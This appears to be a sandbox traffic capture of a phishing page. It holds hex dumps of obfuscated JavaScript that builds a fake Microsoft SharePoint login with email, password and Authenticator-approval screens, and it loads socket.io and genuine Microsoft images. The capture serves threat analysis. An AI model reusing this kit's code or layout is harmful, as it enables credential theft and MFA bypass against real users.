2024-05-29 13:06:22 UTC	794	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:22 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 97840 Connection: close X-Powered-By: Express Access-Control-Allow-Origin: * Cache-Control: public, max-age=14400 Last-Modified: Thu, 23 May 2024 07:44:29 GMT ETag: W/"17e30-18fa4689ae7" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mf9dJnPU0%2BFpU2IJKou5GYjQSFz%2FeJiZqZZ3Ay%2BFCdaD7HTzX00WJMLW4uATlnDiG1QeS1ncmG7VdjoVbrPBMkpRtE%2FaZigxE%2BWUX6785q5%2FHvUDYTXJ2%2BJ3EJIMk5YQBHxUMR4CHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88b6b38bdd9943e8-EWR alt-svc: h3=":443"; ma=86400
2024-05-29 13:06:22 UTC	575	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 34 64 39 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 34 37 65 66 34 35 20 3d 20 5b 27 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 4f 76 65 72 6c 61 79 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6f 76 65 72 6c 61 79 5c 78 32 32 3e 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 63 61 6e 76 61 73 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: function _0x34d9() { const _0x47ef45 = ['\x0a\x0a\x20\x20\x20\x20...\x20Overlay\x20-->\x0a\x20\x20\x20\x20<div\x20class=\x22overlay\x22></div>\x0a\x0a\x20\x20\x20\x20<div\x20class=\x22canvas\x22\x20style=\x22display:\x20none;\x22>\x0a\x20\x20\x20\x20\x20
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 78 32 30 5c 78 32 30 3c 62 72 3e 4d 69 63 72 6f 73 6f 66 74 c2 a9 5c 78 32 30 53 68 61 72 65 70 6f 69 6e 74 3c 2f 64 69 76 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 70 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 6f 67 65 72 4d 65 5c 78 32 32 3e 3c 2f 70 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 6f 61 64 65 72 5c 78 32 32 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 Data Ascii: x20\x20<br>Microsoft\x20Sharepoint</div>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p\x20class=\x22logerMe\x22></p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22loader\x22>Loading...</div>\x0a\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20...\x2
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 3d 5c 78 32 32 65 6d 61 69 6c 49 6e 70 75 74 5c 78 32 32 5c 78 32 30 70 6c 61 63 65 68 6f 6c 64 65 72 3d 5c 78 32 32 45 6d 61 69 6c 2c 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6f 72 5c 78 32 30 53 6b 79 70 65 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 74 65 78 74 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 6f 6e 6b 65 79 70 72 65 73 73 3d 5c 78 32 32 68 69 64 65 45 72 72 6f 72 54 65 78 74 28 74 68 69 73 2e 76 61 6c 75 65 29 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 61 62 65 6c 42 75 74 74 6f 6d 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c Data Ascii: =\x22emailInput\x22\x20placeholder=\x22Email,\x20phone\x20or\x20Skype\x22\x20type=\x22text\x22\x20name=\x22\x22\x20onkeypress=\x22hideErrorText(this.value)\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22labelButtom\x22>\x0a\x20\
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 50 41 53 53 57 4f 52 44 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 42 6c Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20PASSWORD\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20style=\x22display:\x20none;\x22\x20class=\x22passwordBl
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 69 67 6e 49 6e 5c 78 32 32 3e 45 6e 74 65 72 5c 78 32 30 70 61 73 73 77 6f 72 64 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 45 72 72 6f 72 5c 78 32 32 3e 53 65 72 76 65 72 5c 78 32 30 65 72 72 6f 72 2e 5c 78 32 30 70 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 2e 2e 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22signIn\x22>Enter\x20password</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22passwordError\x22>Server\x20error.\x20please\x20try\x20again...</a>\x0a\x20\x20\x20\x20\x20\x
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 6e 64 50 61 73 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 42 75 74 74 6f 6e 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 73 75 62 6d 69 74 5c 78 32 32 3e 53 69 67 6e 5c 78 32 30 69 6e 3c 2f 62 75 74 74 6f 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 62 72 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 4e 4f 5c 78 32 30 50 41 53 53 5c 78 32 30 2d 5c 78 32 30 4d 53 5c 78 32 30 41 50 50 Data Ascii: ndPass\x22\x20class=\x22formButton\x22\x20type=\x22submit\x22>Sign\x20in</button>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<br>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20NO\x20PASS\x20-\x20MS\x20APP
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 76 65 72 69 66 79 5f 66 6c 75 65 6e 74 5f 61 75 74 68 65 6e 74 69 63 61 74 6f 72 5f 35 39 38 39 32 66 31 65 30 35 65 33 61 64 66 39 66 64 32 66 37 31 62 34 32 64 39 32 61 32 37 66 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 70 3e 4f 70 65 6e 5c 78 32 30 79 6f 75 72 5c 78 32 30 41 75 74 68 65 6e 74 69 63 61 74 6f 72 5c 78 32 30 61 70 70 2c 5c 78 32 30 61 6e 64 5c 78 32 30 65 6e 74 65 72 5c 78 32 30 74 68 65 5c 78 32 30 6e 75 6d 62 65 72 5c 78 32 30 73 68 6f 77 6e 5c 78 32 30 74 6f 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 2e e2 80 8b e2 80 8b 3c 2f 70 3e 5c 78 30 61 5c Data Ascii: verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Open\x20your\x20Authenticator\x20app,\x20and\x20enter\x20the\x20number\x20shown\x20to\x20sign\x20in.</p>\x0a\
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 4c 61 62 65 6c 5c 78 32 32 3e 65 6d 61 69 6c 40 67 6d 61 69 6c 2e 63 6f 6d 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 69 67 6e 49 6e 5c 78 32 32 3e 41 70 70 72 6f 76 65 5c 78 Data Ascii: x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22emailLabel\x22>email@gmail.com</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22signIn\x22>Approve\x
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 66 6c 65 78 3b 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 5c 78 32 30 37 70 78 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 30 2e 39 72 65 6d 3b 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 32 32 3e 49 5c 78 32 30 63 61 6e 5c 78 32 37 74 5c 78 32 30 75 73 65 5c 78 32 30 6d 79 5c 78 32 30 41 75 74 68 65 6e 74 69 Data Ascii: \x20style=\x22display:\x20flex;\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20style=\x22padding-right:\x207px;\x20font-size:\x200.9rem;\x20color:\x20#0067b8;\x20cursor:\x20pointer;\x22>I\x20can\x27t\x20use\x20my\x20Authenti
2024-05-29 13:06:22 UTC	1369	IN	Data Raw: 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c Data Ascii: on\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:22 UTC	510	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:22 UTC	701	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Mon, 20 May 2024 02:31:59 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: fra1::xhj9v-1716172319097-8554d9f0984b X-Cache: Hit from cloudfront Via: 1.1 79b38e01cf5e16de2ad2a0ec2187e7f4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: HEL50-C2 X-Amz-Cf-Id: eVMq3Bctnll18jDjw-VLGUV4JNYFwMdondxRJUBQjdscqY5aSywQJw== Age: 815663
2024-05-29 13:06:22 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2024-05-29 13:06:23 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2024-05-29 13:06:23 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:23 UTC	616	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:24 UTC	786	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:24 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 6728eaf8-101e-003b-3ec9-b1e198000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240529T130623Z-16f669959b4f5hg46qn0sb4crc0000000dh000000000tht5 x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-05-29 13:06:24 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:23 UTC	618	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:23 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:23 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: 56f75cad-b01e-0031-7950-b0ef8d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240529T130623Z-16f669959b4n7jj57rtu8vtf4n0000000dn0000000009yvw x-fd-int-roxy-purgeid: 4554691 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-05-29 13:06:23 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Timestamp	Bytes transferred	Direction	Data
